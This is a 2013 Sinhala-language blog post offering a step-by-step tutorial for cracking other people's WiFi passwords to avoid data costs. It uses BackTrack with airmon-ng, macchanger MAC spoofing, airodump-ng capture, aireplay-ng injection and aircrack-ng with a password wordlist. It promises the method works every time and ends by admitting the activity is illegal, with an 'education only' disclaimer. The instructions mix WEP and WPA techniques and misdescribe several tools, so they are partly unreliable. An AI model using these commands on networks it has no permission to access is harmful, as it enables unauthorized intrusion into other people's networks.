ශ්‍රී ලාංකීය වෙබ් කලාවේ නවතම පෙරලිය

හොර බොරු නැතුව WiFi Hack කරමු



ගොඩක් අයට තියන කරදරයක් තමයි Deta කැපෙන කැපිල්ලට internet එකත් එක්කම එපා වෙන එක. මොනා කරන්නද ඉතිං Dialog පාවිච්චි කරන අයනම් මේක සුපිරියටම අත්විදිනවනේ. කොහොමද වෙනස සැපද? Deta Card එක මේ දානව මේ නෑ නේද? මොනා කරන්නද පුතා ලබා උපන් හැටි තමා මේ.... හරි හරි ඕකට විසදුමක් තමා මං ගෙනාවෙ. Town වල ඉන්න අයටනම් මේක ඉතිං සෑහෙන්න වටිනව.ගමේ කියල වෙනසක් නෑ ඉතිං හැමතැනම වගේ දැං wifi තියනවනෙ. අද මං ගෙනාවෙ ඔයාල හැමතැනම හොයන වගේම ගොඩක් අය අහුවෙලා තියන දෙයක්

Wifi Hacking
කට්ටිය ගොඩක් දෙනා මේ ගැන උනන්දුයිනෙ. ගොඩක් කට්ටිය මගෙන් ඇහුව ඇත්තටම මේ wifi hack කරන්න පුලුවන්ද කියල, අද අපි බලමු කොහොමද මේක කරන්නෙ කියල.
බොරු ප්‍රෝඩා නෑ මාත් කරන විදිහම තමා මේ. 100෴ වැඩ කරනවා ඒ ගැන බයවෙන්න එපා.
Automated application එකක්නම් නෙමෙයි මචං මේක. අපි විසිම්ම කරන දෙයක්. කට්ටිය ගොඩක් Automated application වලට අහුවෙනවනේ .
දැං බලමු කරන විදිහ.
මේකට ටිකක් deta ඕන මොකද ටිකක් ලොකු files download කරන්න තියනවා.
5Gb විතර තියාගෙන වැඩේට බහින එක හොදයි නැත්තම් මගදි deta ඉවර වුනොත්
හරි මුලින්ම මේ ටික ඕන කරනව මේ වැඩේට.

Compatible Wireless Adapter

Linax BackTrack 5r3 DVD

password list

Virtual Matchine

WiFi තියෙනම් Compatible Wireless Adapter එකක් ඔයාල ගාව තියෙනවනෙ.
BackTrack 5r3 නැති කට්ටිය මෙතනින් ගිහින් අරගන්න.

Virtual Machine එකෙන් ඔයාගෙ පරිගනකට ස්තාපනය කරගන්න.ඒකට මම බාවිතා කරේ  VmWare මෘදුකාංගය.

හරි මචංල දැං ඕන  ටික Download කරගත්තනෙ එහෙනම්. දැං තියෙන්නෙ සුභ මොහොතින් වැඩේට බහින එක තමා,
දැං ඔයාලයට කරන්න තියෙන්න virtual box එකෙන් Linax BackTrack 5r3 Os එක run කරගන්න.
දැන්  ඔයාල Shell  Commands එකක් Open කරගන්න.ඒකෙ මේ විදානය දෙන්න.එතකොට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා.
airmon-ng



මෙතන පෙන්නන ra0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට  ඔයාලට හැමදේම කියන්නෙ. ඔයාලා ra0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම හොඳේ.
දැන් මේ විදානය දෙන්න.

airmon-ng stop ra0



මෙතනදි අපි කරන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න.දැන් මේ විදානය දෙන්න.

ifconfig ra0 down



දැන් මේ විදානය දෙන්න.

macchanger --mac 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.
airmon-ng start ra0


මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද බලන එක. දැන් මේ විදානය දෙන්න.

airodump-ng ra0


මේකෙ BSSID Code එක Copy කරල තියාගන්න.මොකද ඉස්සරහට ඕන වෙනව.දැන් මේ විදානය දෙන්න.

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0


මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න.. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න.

දැන් මේ විදානය දෙන්න.

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0


දැන් මේ විදානය දෙන්න.

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.

aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)


ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න WiFi නෙට්වර්ක් එකේ Pass Key එක ලබා ගන්න. ඒකට පහල විදානය දෙන්න. මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත් එක දෙන්න ඕනේ.

aircrack-ng crackwpa-01.cap –w list




ඔන්න KEY එක හොයා ගත්ත. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න.

සැ.යු. මෙය නීති විරෝධී කටයුත්තක් බැවින්  කිසිම දේකට වගකියනු නොලබේ. අධ්‍යාපනය සඳහා පමණක් භාවිතා කරන්න කියල ඉල්ලා සිටිනව.









0 comments:

Copyright © 2013 ...:::SDJ:::...